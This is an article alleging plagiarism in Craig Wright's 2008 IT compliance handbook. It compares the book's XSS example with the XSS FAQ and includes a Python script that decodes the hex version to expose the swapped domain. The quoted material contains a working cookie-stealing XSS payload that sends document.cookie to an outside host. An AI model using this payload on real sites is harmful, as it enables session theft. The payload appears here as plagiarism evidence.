Craig S. Wright - "The IT Regulatory and Standards Compliance Handbook" Contains Plagiarism

Sat Jan 7 19:25:05 CST 2012

[Update: Beginning on January 8, 2012, Craig Wright wrote an original rebuttal, a second follow-up a day after, and a third follow-up with additional information (we take some issue with the third, but will not get into it here). In it, he says that he did not properly cite some sources, but also gives additional details saying that some of the material was originally written by him, or as part of a group he was in. Mr. Wright indicates that some of this material, in its original form, is not available on Google, so we cannot verify it. It should be noted that Mr. Wright has spent a considerable amount of time researching each of the points outlined in this article and determining what happened. This includes posting a sincere apology to the XSS FAQ author after mixing up whom to obtain permission from. Many of the points Mr. Wright offers in rebuttal seem valid: he was likely one of several contributors to work that eventually got used and re-used, and ultimately ended up in his book as well. We leave it up to the readers to determine the culpability of Mr. Wright in all of this.]

[Update: 4/21/2020 It has come to our attention that Mr. Wright has been accused of plagiarism several more times. You can read more about it in "Anatomy of a fraud - A deep dive into one of Craig Wright's plagiarized papers" written by Sam Williams in 2019.]

The book "The IT Regulatory and Standards Compliance Handbook: How to Survive an Information Systems Audit and Assessments" by Craig Steven Wright (published July 4, 2008), tech edited by Brian Freedman and Dale Liu, contains plagiarized material. While the quantity of stolen text does not comprise a majority of the book, there is enough to demonstrate systematic plagiarism, typically in the frequent bulleted lists throughout the book. The more interesting (and confusing) thing is that the author properly cites some sources, but not others. In fact, the level or lack of citation could lead one to think that three people contributed to the material. We know that Syngress has hired Technical Editors to provide content for books in the past (e.g., Dustin Fritz and "Dissecting the Hack 1st Edition"). This may be a case where the two technical editors provided material, a task that is not associated with the role of 'technical editor'.

As an example of the curious citations, page 7 has three external references: (Cohen, 1997), (Dijstra, 1976), and (Dodson, 2005). The last chapter of the book on Cyber Law not only has extensive footnotes, but they lead to 10 pages of footnotes citing sources. This is a drastically different method for citation and only appears in the single chapter. These three levels of citation (none, regular, footnotes) could easily be explained if the author and both technical editors contributed material.

The Plagiarism

The following table details the portions of the book that were taken from other sources, making up enough of the material to demonstrate the problem is systemic. In most cases, the plagiarized material is in the form of bulleted lists of points supporting the section. Most of the text spot-checked appeared to be original, with a couple exceptions. This suggests that the author(s) went through considerable effort to generate original content, but got lazy when providing supporting lists. In several cases, attempts were made to obscure the plagiarized content, one of which is included in the next paragraph. This shows willful infringement of copyright and inexcusable plagiarism. Only limited portions of the book were checked due to time constraints.

One of the most obvious places demonstrating that material was not only plagiarized, but that the author attempted to hide the fact that it was lifted, is the section on cross-site scripting (XSS). On page 541, the second and third paragraphs on XSS are almost verbatim from the well-known XSS FAQ. As you can see on the FAQ, the examples of cross-site scripting use "cgisecurity.com" as the domain name. When Wright took this material, he changed that domain to "microsoft.com". However, Wright changed only the ASCII representation and forgot to also change the HEX-encoded version below it. This same mistake also appears on Wright's blog on XSS. From the book and blog:

NOTE: The request is first shown in ASCII, then in Hex for copy and paste purposes.

"><script>document.location='http://www.microsoft.com/cgi-bin/cookie.cgi?'+document.cookie</script>

HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69
%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79
%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20
%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

If you take that HEX string and decode it, you get:

"><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
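The decoding step above can be reproduced mechanically, which is how a reviewer would normally check whether an "ASCII plus hex" pair in a text actually matches. The following Python script is an added example, not code from the book, the blog, or the XSS FAQ. It takes the two strings exactly as quoted from the book excerpt above, percent-decodes the line-wrapped hex copy, pulls the hostnames out of both versions, and reports whether they agree. The function names and the host-matching regular expression are my own choices; the strings are never executed, only decoded and compared, and the host extraction works for any number of URLs in the text, not just the single one in this excerpt.

```python
from urllib.parse import unquote
import re

# Both strings are quoted from the book excerpt reproduced on the page (not constructed).
# The ASCII form is what the book prints; the hex form is the percent-encoded copy
# printed directly beneath it. Neither is executed here; they are only decoded and compared.
ASCII_FORM = (
    "\"><script>document.location='http://www.microsoft.com/cgi-bin/cookie.cgi?'"
    "+document.cookie</script>"
)

HEX_FORM = """
%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69
%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79
%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20
%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
"""

# Hypothetical helper name: matches the host part of any http/https URL in a string.
HOST_RE = re.compile(r"https?://([^/'\"\s]+)")


def decode_hex_form(hex_text: str) -> str:
    """Join the line-wrapped percent-encoded text and decode it back to plain text."""
    joined = "".join(hex_text.split())  # drop the line breaks the book inserted
    return unquote(joined)


def extract_hosts(text: str) -> list[str]:
    """Return every hostname that appears inside a URL in the text, in order."""
    return HOST_RE.findall(text)


def compare_forms(ascii_form: str, hex_form: str) -> dict:
    """Decode the hex copy and report whether it agrees with the printed ASCII copy."""
    decoded = decode_hex_form(hex_form)
    ascii_hosts = extract_hosts(ascii_form)
    hex_hosts = extract_hosts(decoded)
    return {
        "decoded": decoded,
        "ascii_hosts": ascii_hosts,
        "hex_hosts": hex_hosts,
        "consistent": ascii_hosts == hex_hosts,
    }


if __name__ == "__main__":
    result = compare_forms(ASCII_FORM, HEX_FORM)
    print("decoded hex :", result["decoded"])
    print("ASCII hosts :", result["ascii_hosts"])
    print("hex hosts   :", result["hex_hosts"])
    print("consistent  :", result["consistent"])
```

Running it prints the decoded string shown above, with `www.microsoft.com` as the only host in the ASCII copy and `www.cgisecurity.com` as the only host in the hex copy, so `consistent` is `False`. The same comparison applies to any document that claims an encoded block is "the same request" as a plaintext one: decode, extract the identifying fields, and diff them rather than trusting the prose.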

Wright even includes a link to the XSS FAQ shortly after in the additional "References" section, but does not indicate his material was lifted from it.